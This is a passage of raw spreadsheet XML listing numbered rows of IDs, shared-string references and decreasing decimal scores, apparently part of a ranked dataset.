      <c r="C26070" s="2" t="s">
        <v>25065</v>
      </c>
      <c r="D26070" s="2">
        <v>1.0</v>
      </c>
      <c r="E26070" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F26070" s="2">
        <v>0.1237816764132554</v>
      </c>
    </row>
    <row r="26071" ht="15.75" customHeight="1">
      <c r="A26071" s="1">
        <v>19056.0</v>
      </c>
      <c r="B26071" s="2">
        <v>5.4578424E7</v>
      </c>
      <c r="C26071" s="2" t="s">
        <v>25066</v>
      </c>
      <c r="D26071" s="2">
        <v>1.0</v>
      </c>
      <c r="E26071" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F26071" s="2">
        <v>0.1237373737373738</v>
      </c>
    </row>
    <row r="26072" ht="15.75" customHeight="1">
      <c r="A26072" s="1">
        <v>22160.0</v>
      </c>
      <c r="B26072" s="2">
        <v>3.1430996E7</v>
      </c>
      <c r="C26072" s="2" t="s">
        <v>25067</v>
      </c>
      <c r="D26072" s="2">
        <v>1.0</v>
      </c>
      <c r="E26072" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F26072" s="2">
        <v>0.1237373737373738</v>
      </c>
    </row>
    <row r="26073" ht="15.75" customHeight="1">
      <c r="A26073" s="1">
        <v>26990.0</v>
      </c>
      <c r="B26073" s="2">
        <v>1.9772722E7</v>
      </c>
      <c r="C26073" s="2" t="s">
        <v>25068</v>
      </c>
      <c r="D26073" s="2">
        <v>1.0</v>
      </c>
      <c r="E26073" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F26073" s="2">
        <v>0.1237373737373738</v>
      </c>
    </row>
    <row r="26074" ht="15.75" customHeight="1">
      <c r="A26074" s="1">
        <v>32373.0</v>
      </c>
      <c r="B26074" s="2">
        <v>5.6056473E7</v>
      </c>
      <c r="C26074" s="2" t="s">
        <v>25069</v>
      </c>
      <c r="D26074" s="2">
        <v>1.0</v>
      </c>
      <c r="E26074" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F26074" s="2">
        <v>0.1237373737373738</v>
      </c>
    </row>
    <row r="26075" ht="15.75" customHeight="1">
      <c r="A26075" s="1">
        <v>184.0</v>
      </c>
      <c r="B26075" s="2">
        <v>1.4267465E7</v>
      </c>
      <c r="C26075" s="2" t="s">
        <v>25070</v>
      </c>
      <c r="D26075" s="2">
        <v>1.0</v>
      </c>
      <c r="E26075" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F26075" s="2">
        <v>0.1235632183908046</v>
      </c>
    </row>
    <row r="26076" ht="15.75" customHeight="1">
      <c r="A26076" s="1">
        <v>563.0</v>
      </c>
      <c r="B26076" s="2">
        <v>1.8938608E7</v>
      </c>
      <c r="C26076" s="2" t="s">
        <v>25071</v>
      </c>
      <c r="D26076" s="2">
        <v>1.0</v>
      </c>
      <c r="E26076" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F26076" s="2">
        <v>0.1235632183908046</v>
      </c>
    </row>
    <row r="26077" ht="15.75" customHeight="1">
      <c r="A26077" s="1">
        <v>2962.0</v>
      </c>
      <c r="B26077" s="2">
        <v>3.6067643E7</v>
      </c>
      <c r="C26077" s="2" t="s">
        <v>25072</v>
      </c>
      <c r="D26077" s="2">
        <v>1.0</v>
      </c>
      <c r="E26077" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F26077" s="2">
        <v>0.1235632183908046</v>
      </c>
    </row>
    <row r="26078" ht="15.75" customHeight="1">
      <c r="A26078" s="1">
        <v>7196.0</v>
      </c>
      <c r="B26078" s="2">
        <v>5.0584239E7</v>
      </c>
      <c r="C26078" s="2" t="s">
        <v>25073</v>
      </c>
      <c r="D26078" s="2">
        <v>1.0</v>
      </c>
      <c r="E26078" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F26078" s="2">
        <v>0.1235632183908046</v>
      </c>
    </row>
    <row r="26079" ht="15.75" customHeight="1">
      <c r="A26079" s="1">
        <v>8604.0</v>
      </c>
      <c r="B26079" s="2">
        <v>5.4267144E7</v>
      </c>
      <c r="C26079" s="2" t="s">
        <v>25074</v>
      </c>
      <c r="D26079" s="2">
        <v>1.0</v>
      </c>
      <c r="E26079" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F26079" s="2">
        <v>0.1235632183908046</v>
      </c>
    </row>
    <row r="26080" ht="15.75" customHeight="1">
      <c r="A26080" s="1">
        <v>8871.0</v>
      </c>
      <c r="B26080" s="2">
        <v>5.4747496E7</v>
      </c>
      <c r="C26080" s="2" t="s">
        <v>25075</v>
      </c>
      <c r="D26080" s="2">
        <v>1.0</v>
      </c>
      <c r="E26080" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F26080" s="2">
        <v>0.1235632183908046</v>
      </c>
    </row>
    <row r="26081" ht="15.75" customHeight="1">
      <c r="A26081" s="1">
        <v>9625.0</v>
      </c>
      <c r="B26081" s="2">
        <v>5.6216729E7</v>
      </c>
      <c r="C26081" s="2" t="s">
        <v>25076</v>
      </c>
      <c r="D26081" s="2">
        <v>1.0</v>
      </c>
      <c r="E26081" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F26081" s="2">
        <v>0.1235632183908046</v>
      </c>
    </row>
    <row r="26082" ht="15.75" customHeight="1">
      <c r="A26082" s="1">
        <v>11375.0</v>
      </c>
      <c r="B26082" s="2">
        <v>2.1416588E7</v>
      </c>
      <c r="C26082" s="2" t="s">
        <v>25077</v>
      </c>
      <c r="D26082" s="2">
        <v>1.0</v>
      </c>
      <c r="E26082" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F26082" s="2">
        <v>0.1235632183908046</v>
      </c>
    </row>
    <row r="26083" ht="15.75" customHeight="1">
      <c r="A26083" s="1">
        <v>12546.0</v>
      </c>
      <c r="B26083" s="2">
        <v>2.9869406E7</v>
      </c>
      <c r="C26083" s="2" t="s">
        <v>25078</v>
      </c>
      <c r="D26083" s="2">
        <v>1.0</v>
      </c>
      <c r="E26083" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F26083" s="2">
        <v>0.1235632183908046</v>
      </c>
    </row>
    <row r="26084" ht="15.75" customHeight="1">
      <c r="A26084" s="1">
        <v>13036.0</v>
      </c>
      <c r="B26084" s="2">
        <v>3.2978475E7</v>
      </c>
      <c r="C26084" s="2" t="s">
        <v>25079</v>
      </c>
      <c r="D26084" s="2">
        <v>1.0</v>
      </c>
      <c r="E26084" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F26084" s="2">
        <v>0.1235632183908046</v>
      </c>
    </row>
    <row r="26085" ht="15.75" customHeight="1">
      <c r="A26085" s="1">
        <v>13179.0</v>
      </c>
      <c r="B26085" s="2">
        <v>3.4018968E7</v>
      </c>
      <c r="C26085" s="2" t="s">
        <v>25080</v>
      </c>
      <c r="D26085" s="2">
        <v>1.0</v>
      </c>
      <c r="E26085" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F26085" s="2">
        <v>0.1235632183908046</v>
      </c>
    </row>
    <row r="26086" ht="15.75" customHeight="1">
      <c r="A26086" s="1">
        <v>13920.0</v>
      </c>
      <c r="B26086" s="2">
        <v>3.7099265E7</v>
      </c>
      <c r="C26086" s="2" t="s">
        <v>25081</v>
      </c>
      <c r="D26086" s="2">
        <v>1.0</v>
      </c>
      <c r="E26086" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F26086" s="2">
        <v>0.1235632183908046</v>
      </c>
    </row>
    <row r="26087" ht="15.75" customHeight="1">
      <c r="A26087" s="1">
        <v>15851.0</v>
      </c>
      <c r="B26087" s="2">
        <v>4.4446792E7</v>
      </c>
      <c r="C26087" s="2" t="s">
        <v>25082</v>
      </c>
      <c r="D26087" s="2">
        <v>1.0</v>
      </c>
      <c r="E26087" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F26087" s="2">
        <v>0.1235632183908046</v>
      </c>
    </row>
    <row r="26088" ht="15.75" customHeight="1">
      <c r="A26088" s="1">
        <v>16287.0</v>
      </c>
      <c r="B26088" s="2">
        <v>4.5819208E7</v>
      </c>
      <c r="C26088" s="2" t="s">
        <v>25083</v>
      </c>
      <c r="D26088" s="2">
        <v>1.0</v>
      </c>
      <c r="E26088" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F26088" s="2">
        <v>0.1235632183908046</v>
      </c>
    </row>
    <row r="26089" ht="15.75" customHeight="1">
      <c r="A26089" s="1">
        <v>17083.0</v>
      </c>
      <c r="B26089" s="2">
        <v>4.8617982E7</v>
      </c>
      <c r="C26089" s="2" t="s">
        <v>25084</v>
      </c>
      <c r="D26089" s="2">
        <v>1.0</v>
      </c>
      <c r="E26089" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F26089" s="2">
        <v>0.1235632183908046</v>
      </c>
    </row>
    <row r="26090" ht="15.75" customHeight="1">
      <c r="A26090" s="1">
        <v>17211.0</v>
      </c>
      <c r="B26090" s="2">
        <v>4.9039231E7</v>
      </c>
      <c r="C26090" s="2" t="s">
        <v>25085</v>
      </c>
      <c r="D26090" s="2">
        <v>1.0</v>
      </c>
      <c r="E26090" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F26090" s="2">
        <v>0.1235632183908046</v>
      </c>
    </row>
    <row r="26091" ht="15.75" customHeight="1">
      <c r="A26091" s="1">
        <v>21146.0</v>
      </c>
      <c r="B26091" s="2">
        <v>1.867258E7</v>
      </c>
      <c r="C26091" s="2" t="s">
        <v>25086</v>
      </c>
      <c r="D26091" s="2">
        <v>1.0</v>
      </c>
      <c r="E26091" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F26091" s="2">
        <v>0.1235632183908046</v>
      </c>
    </row>
    <row r="26092" ht="15.75" customHeight="1">
      <c r="A26092" s="1">
        <v>21249.0</v>
      </c>
      <c r="B26092" s="2">
        <v>1.9973809E7</v>
      </c>
      <c r="C26092" s="2" t="s">
        <v>25087</v>
      </c>
      <c r="D26092" s="2">
        <v>1.0</v>
      </c>
      <c r="E26092" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F26092" s="2">
        <v>0.1235632183908046</v>
      </c>
    </row>
    <row r="26093" ht="15.75" customHeight="1">
      <c r="A26093" s="1">
        <v>23171.0</v>
      </c>
      <c r="B26093" s="2">
        <v>5.2113243E7</v>
      </c>
      <c r="C26093" s="2" t="s">
        <v>25088</v>
      </c>
      <c r="D26093" s="2">
        <v>1.0</v>
      </c>
      <c r="E26093" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F26093" s="2">
        <v>0.1235632183908046</v>
      </c>
    </row>
    <row r="26094" ht="15.75" customHeight="1">
      <c r="A26094" s="1">
        <v>23196.0</v>
      </c>
      <c r="B26094" s="2">
        <v>5.2431412E7</v>
      </c>
      <c r="C26094" s="2" t="s">
        <v>25089</v>
      </c>
      <c r="D26094" s="2">
        <v>1.0</v>
      </c>
      <c r="E26094" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F26094" s="2">
        <v>0.1235632183908046</v>
      </c>
    </row>
    <row r="26095" ht="15.75" customHeight="1">
      <c r="A26095" s="1">
        <v>23280.0</v>
      </c>
      <c r="B26095" s="2">
        <v>5370132.0</v>
      </c>
      <c r="C26095" s="2" t="s">
        <v>25090</v>
      </c>
      <c r="D26095" s="2">
        <v>1.0</v>
      </c>
      <c r="E26095" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F26095" s="2">
        <v>0.1235632183908046</v>
      </c>
    </row>
    <row r="26096" ht="15.75" customHeight="1">
      <c r="A26096" s="1">
        <v>24316.0</v>
      </c>
      <c r="B26096" s="2">
        <v>1.0604538E7</v>
      </c>
      <c r="C26096" s="2" t="s">
        <v>25091</v>
      </c>
      <c r="D26096" s="2">
        <v>1.0</v>
      </c>
      <c r="E26096" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F26096" s="2">
        <v>0.1235632183908046</v>
      </c>
    </row>
    <row r="26097" ht="15.75" customHeight="1">
      <c r="A26097" s="1">
        <v>25151.0</v>
      </c>
      <c r="B26097" s="2">
        <v>1.3059673E7</v>
      </c>
      <c r="C26097" s="2" t="s">
        <v>25092</v>
      </c>
      <c r="D26097" s="2">
        <v>1.0</v>
      </c>
      <c r="E26097" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F26097" s="2">
        <v>0.1235632183908046</v>
      </c>
    </row>
    <row r="26098" ht="15.75" customHeight="1">
      <c r="A26098" s="1">
        <v>25277.0</v>
      </c>
      <c r="B26098" s="2">
        <v>1.339492E7</v>
      </c>
      <c r="C26098" s="2" t="s">
        <v>25093</v>
      </c>
      <c r="D26098" s="2">
        <v>1.0</v>
      </c>
      <c r="E26098" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F26098" s="2">
        <v>0.1235632183908046</v>
      </c>
    </row>
    <row r="26099" ht="15.75" customHeight="1">
      <c r="A26099" s="1">
        <v>25307.0</v>
      </c>
      <c r="B26099" s="2">
        <v>1.3425323E7</v>
      </c>
      <c r="C26099" s="2" t="s">
        <v>25094</v>
      </c>
      <c r="D26099" s="2">
        <v>1.0</v>
      </c>
      <c r="E26099" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F26099" s="2">
        <v>0.1235632183908046</v>
      </c>
    </row>
    <row r="26100" ht="15.75" customHeight="1">
      <c r="A26100" s="1">
        <v>25435.0</v>
      </c>
      <c r="B26100" s="2">
        <v>1.3850834E7</v>
      </c>
      <c r="C26100" s="2" t="s">
        <v>25095</v>
      </c>
      <c r="D26100" s="2">
        <v>1.0</v>
      </c>
      <c r="E26100" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F26100" s="2">
        <v>0.1235632183908046</v>
      </c>
    </row>
    <row r="26101" ht="15.75" customHeight="1">
      <c r="A26101" s="1">
        <v>25990.0</v>
      </c>
      <c r="B26101" s="2">
        <v>1.5330105E7</v>
      </c>
      <c r="C26101" s="2" t="s">
        <v>25096</v>
      </c>
      <c r="D26101" s="2">
        <v>1.0</v>
      </c>
      <c r="E26101" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F26101" s="2">
        <v>0.1235632183908046</v>
      </c>
    </row>
    <row r="26102" ht="15.75" customHeight="1">
      <c r="A26102" s="1">
        <v>26782.0</v>
      </c>
      <c r="B26102" s="2">
        <v>1.8551004E7</v>
      </c>
      <c r="C26102" s="2" t="s">
        <v>25097</v>
      </c>
      <c r="D26102" s="2">
        <v>1.0</v>
      </c>
      <c r="E26102" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F26102" s="2">
        <v>0.1235632183908046</v>
      </c>
    </row>
    <row r="26103" ht="15.75" customHeight="1">
      <c r="A26103" s="1">
        <v>26783.0</v>
      </c>
      <c r="B26103" s="2">
        <v>1.8551004E7</v>
      </c>
      <c r="C26103" s="2" t="s">
        <v>25098</v>
      </c>
      <c r="D26103" s="2">
        <v>1.0</v>
      </c>
      <c r="E26103" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F26103" s="2">
        <v>0.1235632183908046</v>
      </c>
    </row>
    <row r="26104" ht="15.75" customHeight="1">
      <c r="A26104" s="1">
        <v>27290.0</v>
      </c>
      <c r="B26104" s="2">
        <v>2.1244333E7</v>
      </c>
      <c r="C26104" s="2" t="s">
        <v>25099</v>
      </c>
      <c r="D26104" s="2">
        <v>1.0</v>
      </c>
      <c r="E26104" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F26104" s="2">
        <v>0.1235632183908046</v>
      </c>
    </row>
    <row r="26105" ht="15.75" customHeight="1">
      <c r="A26105" s="1">
        <v>27579.0</v>
      </c>
      <c r="B26105" s="2">
        <v>2.250173E7</v>
      </c>
      <c r="C26105" s="2" t="s">
        <v>25100</v>
      </c>
      <c r="D26105" s="2">
        <v>1.0</v>
      </c>
      <c r="E26105" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F26105" s="2">
        <v>0.1235632183908046</v>
      </c>
    </row>
    <row r="26106" ht="15.75" customHeight="1">
      <c r="A26106" s="1">
        <v>27596.0</v>
      </c>
      <c r="B26106" s="2">
        <v>2.2571962E7</v>
      </c>
      <c r="C26106" s="2" t="s">
        <v>25101</v>
      </c>
      <c r="D26106" s="2">
        <v>1.0</v>
      </c>
      <c r="E26106" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F26106" s="2">
        <v>0.1235632183908046</v>
      </c>
    </row>
    <row r="26107" ht="15.75" customHeight="1">
      <c r="A26107" s="1">
        <v>27783.0</v>
      </c>
      <c r="B26107" s="2">
        <v>2.3127582E7</v>
      </c>
      <c r="C26107" s="2" t="s">
        <v>25102</v>
      </c>
      <c r="D26107" s="2">
        <v>1.0</v>
      </c>
      <c r="E26107" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F26107" s="2">
        <v>0.1235632183908046</v>
      </c>
    </row>
    <row r="26108" ht="15.75" customHeight="1">
      <c r="A26108" s="1">
        <v>27960.0</v>
      </c>
      <c r="B26108" s="2">
        <v>2.3928196E7</v>
      </c>
      <c r="C26108" s="2" t="s">
        <v>25103</v>
      </c>
      <c r="D26108" s="2">
        <v>1.0</v>
      </c>
      <c r="E26108" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F26108" s="2">
        <v>0.1235632183908046</v>
      </c>
    </row>
    <row r="26109" ht="15.75" customHeight="1">
      <c r="A26109" s="1">
        <v>28025.0</v>
      </c>
      <c r="B26109" s="2">
        <v>2.4407806E7</v>
      </c>
      <c r="C26109" s="2" t="s">
        <v>25104</v>
      </c>
      <c r="D26109" s="2">
        <v>1.0</v>
      </c>
      <c r="E26109" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F26109" s="2">
        <v>0.1235632183908046</v>
      </c>
    </row>
    <row r="26110" ht="15.75" customHeight="1">
      <c r="A26110" s="1">
        <v>28529.0</v>
      </c>
      <c r="B26110" s="2">
        <v>2.6757394E7</v>
      </c>
      <c r="C26110" s="2" t="s">
        <v>25105</v>
      </c>
      <c r="D26110" s="2">
        <v>1.0</v>
      </c>
      <c r="E26110" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F26110" s="2">
        <v>0.1235632183908046</v>
      </c>
    </row>
    <row r="26111" ht="15.75" customHeight="1">
      <c r="A26111" s="1">
        <v>29416.0</v>
      </c>
      <c r="B26111" s="2">
        <v>3.2177715E7</v>
      </c>
      <c r="C26111" s="2" t="s">
        <v>25106</v>
      </c>
      <c r="D26111" s="2">
        <v>1.0</v>
      </c>
      <c r="E26111" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F26111" s="2">
        <v>0.1235632183908046</v>
      </c>
    </row>
    <row r="26112" ht="15.75" customHeight="1">
      <c r="A26112" s="1">
        <v>29905.0</v>
      </c>
      <c r="B26112" s="2">
        <v>3607050.0</v>
      </c>
      <c r="C26112" s="2" t="s">
        <v>25107</v>
      </c>
      <c r="D26112" s="2">
        <v>1.0</v>
      </c>
      <c r="E26112" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F26112" s="2">
        <v>0.1235632183908046</v>
      </c>
    </row>
    <row r="26113" ht="15.75" customHeight="1">
      <c r="A26113" s="1">
        <v>30460.0</v>
      </c>
      <c r="B26113" s="2">
        <v>3.947927E7</v>
      </c>
      <c r="C26113" s="2" t="s">
        <v>25108</v>
      </c>
      <c r="D26113" s="2">
        <v>1.0</v>
      </c>
      <c r="E26113" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F26113" s="2">
        <v>0.1235632183908046</v>
      </c>
    </row>
    <row r="26114" ht="15.75" customHeight="1">
      <c r="A26114" s="1">
        <v>31720.0</v>
      </c>
      <c r="B26114" s="2">
        <v>5.2113242E7</v>
      </c>
      <c r="C26114" s="2" t="s">
        <v>25088</v>
      </c>
      <c r="D26114" s="2">
        <v>1.0</v>
      </c>
      <c r="E26114" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F26114" s="2">
        <v>0.1235632183908046</v>
      </c>
    </row>
    <row r="26115" ht="15.75" customHeight="1">
      <c r="A26115" s="1">
        <v>32778.0</v>
      </c>
      <c r="B26115" s="2">
        <v>6117747.0</v>
      </c>
      <c r="C26115" s="2" t="s">
        <v>25109</v>
      </c>
      <c r="D26115" s="2">
        <v>1.0</v>
      </c>
      <c r="E26115" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F26115" s="2">
        <v>0.1235632183908046</v>
      </c>
    </row>
    <row r="26116" ht="15.75" customHeight="1">
      <c r="A26116" s="1">
        <v>33137.0</v>
      </c>
      <c r="B26116" s="2">
        <v>7065764.0</v>
      </c>
      <c r="C26116" s="2" t="s">
        <v>25110</v>
      </c>
      <c r="D26116" s="2">
        <v>1.0</v>
      </c>
      <c r="E26116" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F26116" s="2">
        <v>0.1235632183908046</v>
      </c>
    </row>
    <row r="26117" ht="15.75" customHeight="1">
      <c r="A26117" s="1">
        <v>33541.0</v>
      </c>
      <c r="B26117" s="2">
        <v>8166288.0</v>
      </c>
      <c r="C26117" s="2" t="s">
        <v>25111</v>
      </c>
      <c r="D26117" s="2">
        <v>1.0</v>
      </c>
      <c r="E26117" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F26117" s="2">
        <v>0.1235632183908046</v>
      </c>
    </row>
    <row r="26118" ht="15.75" customHeight="1">
      <c r="A26118" s="1">
        <v>15883.0</v>
      </c>
      <c r="B26118" s="2">
        <v>4.4529625E7</v>
      </c>
      <c r="C26118" s="2" t="s">
        <v>25112</v>
      </c>
      <c r="D26118" s="2">
        <v>1.0</v>
      </c>
      <c r="E26118" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F26118" s="2">
        <v>0.1233660130718955</v>
      </c>
    </row>
    <row r="26119" ht="15.75" customHeight="1">
      <c r="A26119" s="1">
        <v>21725.0</v>
      </c>
      <c r="B26119" s="2">
        <v>2.5646799E7</v>
      </c>
      <c r="C26119" s="2" t="s">
        <v>25113</v>
      </c>
      <c r="D26119" s="2">
        <v>1.0</v>
      </c>
      <c r="E26119" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F26119" s="2">
        <v>0.1233521657250471</v>
      </c>
    </row>
    <row r="26120" ht="15.75" customHeight="1">
      <c r="A26120" s="1">
        <v>22139.0</v>
      </c>
      <c r="B26120" s="2">
        <v>3.1130756E7</v>
      </c>
      <c r="C26120" s="2" t="s">
        <v>25114</v>
      </c>
      <c r="D26120" s="2">
        <v>1.0</v>
      </c>
      <c r="E26120" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F26120" s="2">
        <v>0.1233521657250471</v>
      </c>
    </row>
    <row r="26121" ht="15.75" customHeight="1">
      <c r="A26121" s="1">
        <v>26175.0</v>
      </c>
      <c r="B26121" s="2">
        <v>1.6153138E7</v>
      </c>
      <c r="C26121" s="2" t="s">
        <v>25115</v>
      </c>
      <c r="D26121" s="2">
        <v>1.0</v>
      </c>
      <c r="E26121" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F26121" s="2">
        <v>0.1233521657250471</v>
      </c>
    </row>
    <row r="26122" ht="15.75" customHeight="1">
      <c r="A26122" s="1">
        <v>33054.0</v>
      </c>
      <c r="B26122" s="2">
        <v>6802164.0</v>
      </c>
      <c r="C26122" s="2" t="s">
        <v>25116</v>
      </c>
      <c r="D26122" s="2">
        <v>1.0</v>
      </c>
      <c r="E26122" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F26122" s="2">
        <v>0.1233521657250471</v>
      </c>
    </row>
    <row r="26123" ht="15.75" customHeight="1">
      <c r="A26123" s="1">
        <v>32981.0</v>
      </c>
      <c r="B26123" s="2">
        <v>6600461.0</v>
      </c>
      <c r="C26123" s="2" t="s">
        <v>25117</v>
      </c>
      <c r="D26123" s="2">
        <v>1.0</v>
      </c>
      <c r="E26123" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F26123" s="2">
        <v>0.1231481481481482</v>
      </c>
    </row>
    <row r="26124" ht="15.75" customHeight="1">
      <c r="A26124" s="1">
        <v>26955.0</v>
      </c>
      <c r="B26124" s="2">
        <v>1.961731E7</v>
      </c>
      <c r="C26124" s="2" t="s">
        <v>25118</v>
      </c>
      <c r="D26124" s="2">
        <v>1.0</v>
      </c>
      <c r="E26124" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F26124" s="2">
        <v>0.1231481481481481</v>
      </c>
    </row>
    <row r="26125" ht="15.75" customHeight="1">
      <c r="A26125" s="1">
        <v>29428.0</v>
      </c>
      <c r="B26125" s="2">
        <v>3.2219188E7</v>
      </c>
      <c r="C26125" s="2" t="s">
        <v>25119</v>
      </c>
      <c r="D26125" s="2">
        <v>1.0</v>
      </c>
      <c r="E26125" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F26125" s="2">
        <v>0.1229508196721311</v>
      </c>
    </row>
    <row r="26126" ht="15.75" customHeight="1">
      <c r="A26126" s="1">
        <v>27997.0</v>
      </c>
      <c r="B26126" s="2">
        <v>2.4224602E7</v>
      </c>
      <c r="C26126" s="2" t="s">
        <v>25120</v>
      </c>
      <c r="D26126" s="2">
        <v>1.0</v>
      </c>
      <c r="E26126" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F26126" s="2">
        <v>0.1227598566308244</v>
      </c>
    </row>
    <row r="26127" ht="15.75" customHeight="1">
      <c r="A26127" s="1">
        <v>30405.0</v>
      </c>
      <c r="B26127" s="2">
        <v>3.8762313E7</v>
      </c>
      <c r="C26127" s="2" t="s">
        <v>25029</v>
      </c>
      <c r="D26127" s="2">
        <v>1.0</v>
      </c>
      <c r="E26127" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F26127" s="2">
        <v>0.1226415094339623</v>
      </c>
    </row>
    <row r="26128" ht="15.75" customHeight="1">
      <c r="A26128" s="1">
        <v>11773.0</v>
      </c>
      <c r="B26128" s="2">
        <v>2.4251145E7</v>
      </c>
      <c r="C26128" s="2" t="s">
        <v>25121</v>
      </c>
      <c r="D26128" s="2">
        <v>1.0</v>
      </c>
      <c r="E26128" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F26128" s="2">
        <v>0.1224279835390946</v>
      </c>
    </row>
    <row r="26129" ht="15.75" customHeight="1">
      <c r="A26129" s="1">
        <v>30973.0</v>
      </c>
      <c r="B26129" s="2">
        <v>4.748165E7</v>
      </c>
      <c r="C26129" s="2" t="s">
        <v>25122</v>
      </c>
      <c r="D26129" s="2">
        <v>1.0</v>
      </c>
      <c r="E26129" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F26129" s="2">
        <v>0.1224279835390946</v>
      </c>
    </row>
    <row r="26130" ht="15.75" customHeight="1">
      <c r="A26130" s="1">
        <v>3344.0</v>
      </c>
      <c r="B26130" s="2">
        <v>3.773753E7</v>
      </c>
      <c r="C26130" s="2" t="s">
        <v>25123</v>
      </c>
      <c r="D26130" s="2">
        <v>1.0</v>
      </c>
      <c r="E26130" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F26130" s="2">
        <v>0.1220238095238095</v>
      </c>
    </row>
    <row r="26131" ht="15.75" customHeight="1">
      <c r="A26131" s="1">
        <v>17273.0</v>
      </c>
      <c r="B26131" s="2">
        <v>4.9182103E7</v>
      </c>
      <c r="C26131" s="5" t="s">
        <v>25124</v>
      </c>
      <c r="D26131" s="2">
        <v>1.0</v>
      </c>
      <c r="E26131" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F26131" s="2">
        <v>0.1220238095238095</v>
      </c>
    </row>
    <row r="26132" ht="15.75" customHeight="1">
      <c r="A26132" s="1">
        <v>26236.0</v>
      </c>
      <c r="B26132" s="2">
        <v>1.6282675E7</v>
      </c>
      <c r="C26132" s="2" t="s">
        <v>25125</v>
      </c>
      <c r="D26132" s="2">
        <v>1.0</v>
      </c>
      <c r="E26132" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F26132" s="2">
        <v>0.1220238095238095</v>
      </c>
    </row>
    <row r="26133" ht="15.75" customHeight="1">
      <c r="A26133" s="1">
        <v>29904.0</v>
      </c>
      <c r="B26133" s="2">
        <v>3607050.0</v>
      </c>
      <c r="C26133" s="5" t="s">
        <v>25126</v>
      </c>
      <c r="D26133" s="2">
        <v>1.0</v>
      </c>
      <c r="E26133" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F26133" s="2">
        <v>0.1220238095238095</v>
      </c>
    </row>
    <row r="26134" ht="15.75" customHeight="1">
      <c r="A26134" s="1">
        <v>32046.0</v>
      </c>
      <c r="B26134" s="2">
        <v>5370131.0</v>
      </c>
      <c r="C26134" s="2" t="s">
        <v>25127</v>
      </c>
      <c r="D26134" s="2">
        <v>1.0</v>
      </c>
      <c r="E26134" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F26134" s="2">
        <v>0.1220238095238095</v>
      </c>
    </row>
    <row r="26135" ht="15.75" customHeight="1">
      <c r="A26135" s="1">
        <v>19203.0</v>
      </c>
      <c r="B26135" s="2">
        <v>5.4985437E7</v>
      </c>
      <c r="C26135" s="2" t="s">
        <v>25128</v>
      </c>
      <c r="D26135" s="2">
        <v>1.0</v>
      </c>
      <c r="E26135" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F26135" s="2">
        <v>0.1218905472636816</v>
      </c>
    </row>
    <row r="26136" ht="15.75" customHeight="1">
      <c r="A26136" s="1">
        <v>30670.0</v>
      </c>
      <c r="B26136" s="2">
        <v>4.2190057E7</v>
      </c>
      <c r="C26136" s="2" t="s">
        <v>25129</v>
      </c>
      <c r="D26136" s="2">
        <v>1.0</v>
      </c>
      <c r="E26136" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F26136" s="2">
        <v>0.1218905472636816</v>
      </c>
    </row>
    <row r="26137" ht="15.75" customHeight="1">
      <c r="A26137" s="1">
        <v>34257.0</v>
      </c>
      <c r="B26137" s="2">
        <v>5.5047233E7</v>
      </c>
      <c r="C26137" s="2" t="s">
